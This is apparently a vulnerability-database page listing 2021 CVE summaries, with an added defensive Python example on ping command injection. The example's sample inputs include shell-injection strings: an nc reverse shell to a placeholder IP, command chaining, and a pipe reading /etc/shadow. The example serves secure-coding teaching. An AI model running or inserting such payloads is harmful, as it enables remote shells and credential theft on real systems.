Vulnerabilities

To inform, warn and assist professionals about the latest security vulnerabilities in technology systems, we provide a database, in Spanish, that includes the latest documented and recognised vulnerabilities.

This repository, with over 75,000 records, is based on information from the NVD (National Vulnerability Database); under a partnership agreement, INCIBE translates the included information into Spanish.

Occasionally this list shows vulnerabilities that have not yet been translated, because entries are added while the INCIBE team is still translating them. Vulnerabilities are identified by their CVE (Common Vulnerabilities and Exposures) identifier, the standard for information security vulnerability names, so that information can be exchanged between different tools and databases.

Every vulnerability collected is linked to its information sources and to any patches or fixes published by manufacturers and developers. Advanced searches are supported: results can be narrowed by criteria such as vulnerability type, manufacturer and impact level, among others.

RSS feeds and newsletters provide daily notification of the latest vulnerabilities added to the repository. Below is a list, updated daily, of the latest vulnerabilities.

CVE-2021-4026

Publication date:
30/11/2021
bookstack is vulnerable to Improper Access Control
Severity CVSS v4.0: Pending analysis
Last modification:
09/08/2022

CVE-2021-43319

Publication date:
30/11/2021
Zoho ManageEngine Network Configuration Manager before 125488 is vulnerable to command injection due to improper validation in the Ping functionality.
Severity CVSS v4.0: Pending analysis
Last modification:
06/04/2022

CVE-2021-43295

Publication date:
30/11/2021
Zoho ManageEngine SupportCenter Plus before 11016 is vulnerable to Reflected XSS in the Accounts module.
Severity CVSS v4.0: Pending analysis
Last modification:
27/04/2022

CVE-2021-43296

Publication date:
30/11/2021
Zoho ManageEngine SupportCenter Plus before 11016 is vulnerable to an SSRF attack in ActionExecutor.
Severity CVSS v4.0: Pending analysis
Last modification:
27/04/2022

CVE-2021-44230

Publication date:
30/11/2021
PortSwigger Burp Suite Enterprise Edition before 2021.11 on Windows has weak file permissions for the embedded H2 database, which might lead to privilege escalation. This issue can be exploited by an adversary who has already compromised a valid Windows account on the server via separate means. In this scenario, the compromised account may have inherited read access to sensitive configuration, database, and log files.
Severity CVSS v4.0: Pending analysis
Last modification:
01/12/2021

CVE-2021-43294

Publication date:
30/11/2021
Zoho ManageEngine SupportCenter Plus before 11016 is vulnerable to Reflected XSS in the Products module.
Severity CVSS v4.0: Pending analysis
Last modification:
27/04/2022

CVE-2021-42099

Publication date:
30/11/2021
Zoho ManageEngine M365 Manager Plus before 4421 is vulnerable to file-upload remote code execution.
Severity CVSS v4.0: Pending analysis
Last modification:
06/12/2021

CVE-2021-43284

Publication date:
30/11/2021
An issue was discovered on Victure WR1200 devices through 1.0.3. The root SSH password never gets updated from its default value of admin. This enables an attacker to gain control of the device through SSH (regardless of whether the admin password was changed on the web interface).
Severity CVSS v4.0: Pending analysis
Last modification:
03/12/2021

CVE-2021-43283

Publication date:
30/11/2021
An issue was discovered on Victure WR1200 devices through 1.0.3. A command injection vulnerability was found within the web interface of the device, allowing an attacker with valid credentials to inject arbitrary shell commands to be executed by the device with root privileges. This occurs in the ping and traceroute features. An attacker would thus be able to use this vulnerability to open a reverse shell on the device with root privileges.
Severity CVSS v4.0: Pending analysis
Last modification:
03/12/2021
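CVE-2021-43319 (ManageEngine Network Configuration Manager) and CVE-2021-43283 (Victure WR1200) describe the same class of flaw: a diagnostic ping or traceroute feature that passes a user-supplied host into a shell command. The Python below is an added example, not code from either vendor or from INCIBE; it shows the injectable pattern next to a hardened form that allow-lists the target (IP literal or well-formed hostname) and invokes ping as an argv list with no shell. The sample targets, function names and the `-c 1 -W 2` flags are illustrative assumptions and are not taken from either advisory.

```python
import ipaddress
import re
import subprocess
from typing import List, Optional

# Constructed sample inputs, standing in for what a device's web "ping"
# form might receive. The hostile ones carry shell metacharacters that a
# string-built command would hand straight to /bin/sh.
SAMPLE_TARGETS = [
    "192.0.2.10",                              # benign IPv4
    "2001:db8::1",                             # benign IPv6
    "Router.Example.Test",                     # benign hostname
    "192.0.2.10; id",                          # command chaining
    "$(nc -e /bin/sh 198.51.100.5 4444)",      # command substitution
    "8.8.8.8 | cat /etc/shadow",               # pipe
    "-f",                                      # option injection
    "",                                        # empty
    "a" * 300,                                 # oversized
]

# One hostname label (RFC 1123): alphanumerics and hyphens, no leading or
# trailing hyphen, 1 to 63 characters.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def vulnerable_ping_command(target: str) -> str:
    """The injectable pattern: user input pasted into a shell command string.

    Passed to subprocess.run(..., shell=True) or system(), everything after
    ';' or '|', or inside '$( )', runs as a separate command with the
    service's privileges (root on the WR1200, per the advisory). Returned
    as a string here so this example never executes it.
    """
    return f"ping -c 1 {target}"


def validate_target(target: str) -> Optional[str]:
    """Return a canonical host if target is an IP literal or a well-formed
    hostname, otherwise None.

    This is an allow-list on the shape of the input: IP literals are parsed
    by the ipaddress module, hostnames must consist solely of valid labels.
    Shell metacharacters, whitespace and a leading '-' never pass.
    """
    if not target or len(target) > 253:
        return None
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass  # not an IP literal; try it as a hostname
    name = target.rstrip(".")
    labels = name.split(".")
    if labels and all(_LABEL.match(label) for label in labels):
        return name.lower()
    return None


def safe_ping_argv(target: str) -> Optional[List[str]]:
    """Build an argv list for a validated target, or None if it is rejected.

    Each list element becomes exactly one argument to ping and no shell is
    involved, so even a metacharacter that slipped past validation could
    not start a second command. validate_target also rules out a leading
    '-', so the host cannot be mistaken for a ping option.
    """
    host = validate_target(target)
    if host is None:
        return None
    return ["ping", "-c", "1", "-W", "2", host]


def run_ping(target: str) -> Optional[str]:
    """Execute the hardened form and return ping's stdout (None if rejected).

    Not called by the demo below, since it needs a ping binary and a
    network; it shows how the argv list is consumed without a shell.
    """
    argv = safe_ping_argv(target)
    if argv is None:
        return None
    result = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return result.stdout


def classify(targets: List[str]) -> dict:
    """Map each sample to 'accepted' or 'rejected' under the hardened form."""
    return {t: ("accepted" if safe_ping_argv(t) else "rejected") for t in targets}


if __name__ == "__main__":
    for target, verdict in classify(SAMPLE_TARGETS).items():
        print(f"{verdict:8} {target[:40]!r:44} "
              f"shell string would be: {vulnerable_ping_command(target)[:60]!r}")
```

Both controls are needed: the allow-list stops the diagnostic feature being turned into a generic command runner, and dropping the shell means a validation gap cannot become code execution. Note that neither addresses the other half of the WR1200 advisory, a service running the ping as root; the process executing diagnostics should hold only the privileges that ping itself needs.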

CVE-2021-43282

Publication date:
30/11/2021
An issue was discovered on Victure WR1200 devices through 1.0.3. The default Wi-Fi WPA2 key is advertised to anyone within Wi-Fi range through the router's MAC address. The device default Wi-Fi password corresponds to the last 4 bytes of the MAC address of its 2.4 GHz network interface controller (NIC). An attacker within scanning range of the Wi-Fi network can thus scan for Wi-Fi networks to obtain the default key.
Severity CVSS v4.0: Pending analysis
Last modification:
03/12/2021

CVE-2021-22095

Publication date:
30/11/2021
In Spring AMQP versions 2.2.0 - 2.2.19 and 2.3.0 - 2.3.11, the Spring AMQP Message object, in its toString() method, will create a new String object from the message body, regardless of its size. This can cause an OOM Error with a large message.
Severity CVSS v4.0: Pending analysis
Last modification:
01/12/2021

CVE-2021-26612

Publication date:
30/11/2021
An improper input validation issue leading to arbitrary file creation was discovered in the copy method of the Nexacro platform. Remote attackers can use the copy method to create a file containing malicious code and then execute arbitrary commands.
Severity CVSS v4.0: Pending analysis
Last modification:
01/12/2021